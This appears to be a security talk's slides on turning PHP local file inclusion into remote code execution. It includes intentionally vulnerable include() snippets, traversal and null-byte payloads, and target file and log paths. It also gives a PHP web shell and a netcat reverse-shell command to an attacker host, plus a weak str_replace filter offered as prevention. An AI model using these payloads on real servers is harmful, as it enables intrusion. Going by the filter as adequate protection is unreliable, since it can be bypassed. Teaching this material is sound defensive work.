Journey From LFI to RCE - G.Manideep @mani0x00

Upload: nu-the-open-security-community

Posted on 11-Apr-2017

Page 1: LFI to RCE

Journey From LFI to RCE

-G.Manideep

@mani0x00

Page 2: LFI to RCE

#Who am I?

Member at #nullhyd

Pursuing B.tech 4th year

Jack of all, master of none!

Interested in Information Security

Page 3: LFI to RCE

#What am I gonna talk about?

LFI, RFI and RCE − 10%

And …. Demos ;) − 90%

Page 4: LFI to RCE

#What you need to know?

cd .. (how to change directories :p )

Netcat

A little knowledge of PHP

SSH

Let’s Go!!!

Page 5: LFI to RCE

#Disclaimer

Page 6: LFI to RCE

#Local File Inclusion

Local File Inclusion is the process of including files on a server through the web browser. This vulnerability occurs when a page include is not properly sanitized and allows directory traversal characters to be injected.

```php
<?php
$page = $_GET["page"];
include($page); // Vulnerable!! The user-supplied value reaches include() unchecked
?>
```

Page 7: LFI to RCE

#Local File Inclusion

What if the attacker sets page to "../../../../etc/passwd"? The include then reads the contents of /etc/passwd back to the attacker.

Vulnerable functions that lead to LFI:

- include()

- include_once()

- require()

- require_once()

- fopen()

Page 8: LFI to RCE

#Finding Vulnerable Functions

Make Mistakes! :D

Page 9: LFI to RCE

#Local File Inclusion

```php
<?php
if ($_GET["page"]) {
    $file = $_GET["page"];
    // Strips the first null byte and everything after it
    $file = preg_replace('/\x00.*/', "", $file);
    include($file);
}
?>
```

In this case we may use a null-byte terminator (%00) to perform LFI.

E.g.: ?page=../../../../../../../../var/log/auth.log%00

Page 10: LFI to RCE

#Local File Inclusion

Some files to verify LFI with:

/etc/passwd

/etc/shadow

/etc/group

/etc/security/passwd

/etc/security/user

/etc/security/environ

/etc/security/limits

Database configuration, e.g. config.inc.php

Page 11: LFI to RCE

#Remote File Inclusion

RFI stands for Remote File Inclusion; it allows the attacker to make a website or server include a custom-coded/malicious file hosted elsewhere. The vulnerability exploits poor validation checks in websites and can eventually lead to code execution on the server or code execution in the website (an XSS attack using JavaScript).

```php
<?php
$file = "http://Somesite/c99.php?"; // in the real page this comes from $_GET['page']
include($file . ".php");           // includes http://Somesite/c99.php?.php
?>
```

Page 12: LFI to RCE

#Prevention

Do not permit appending file paths directly.

Use `str_replace('../', '', $_GET['file']);`

If you definitely need dynamic path concatenation, ensure you only accept required characters such as "a-Z 0-9" and do not allow "..", "/", "%00" (null byte) or any other similar unexpected characters.
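As an added example, not from the slides: the prevention advice above turned into code, with the single str_replace() filter beside an allowlist-plus-realpath() include, run over a few constructed payloads (the pages directory and page names are assumptions).

```php
<?php
// Added example, not from the slides: the deck's str_replace filter
// beside an allowlist + realpath() include for the "?page=" pattern.

// Weak: one str_replace('../', '') pass is defeated by "....//",
// which collapses to "../" once the inner "../" is removed.
function weak_filter(string $page): string
{
    return str_replace('../', '', $page);
}

// Hardened: allowlisted characters only (so "..", "/", "\0" never pass),
// a fixed extension, and realpath() confinement to $pagesDir.
// $pagesDir is an assumed location; it must exist for realpath() to work.
function safe_page_path(string $page, string $pagesDir): ?string
{
    // /D: "$" must match at the very end, not before a trailing newline.
    if (!preg_match('/^[A-Za-z0-9_-]+$/D', $page)) {
        return null;
    }
    $base = realpath($pagesDir);
    $candidate = realpath($pagesDir . DIRECTORY_SEPARATOR . $page . '.php');
    // realpath() returns false for missing files: fail closed.
    if ($base === false || $candidate === false) {
        return null;
    }
    // Belt and braces: the resolved file must sit under the pages directory.
    if (strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $candidate;
}

// Constructed probes, including the payloads from the slides.
$probes = [
    'home',                               // legitimate page name
    '../../../../etc/passwd',             // classic traversal
    '....//....//....//....//etc/passwd', // survives a single str_replace
    "../../var/log/auth.log\0",           // null-byte terminator
];
foreach ($probes as $p) {
    printf("%-40s weak=%-36s safe=%s\n",
        addcslashes($p, "\0"),
        addcslashes(weak_filter($p), "\0"),
        safe_page_path($p, __DIR__ . '/pages') ?? 'REJECTED');
}
```

PHP 5.3.4 and later already refuse include() of a path containing a null byte, but the allowlist rejects it regardless, and 'home' is only accepted once pages/home.php actually exists.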

Page 13: LFI to RCE

#Demo On LFI&RFI

Page 14: LFI to RCE

#Remember

Finding

Exploitation

Page 15: LFI to RCE

#Exploitation

Verifying RCE with phpinfo()

Verifying the hack by pinging our machine

Getting a shell

Page 16: LFI to RCE

#Remote Code Execution

The process of executing your own scripts on the web server remotely is called "Remote Code Execution".

Page 17: LFI to RCE

#Verifying the Hack

Let's ping ourselves!

Page 18: LFI to RCE

#Shell Time

Include a malicious PHP snippet:

```php
<?php exec($_GET['cmd']); ?>
```

Let's make a GET request:

…..&cmd=nc <ip> <port> -e /bin/bash

Page 19: LFI to RCE

#Log Locations

../apache/logs/error.log

../apache/logs/access.log

../etc/httpd/logs/access_log

../usr/local/apache/logs/access.log

../var/log/apache2/error_log

../var/www/logs/error_log

Page 20: LFI to RCE

#Thanks!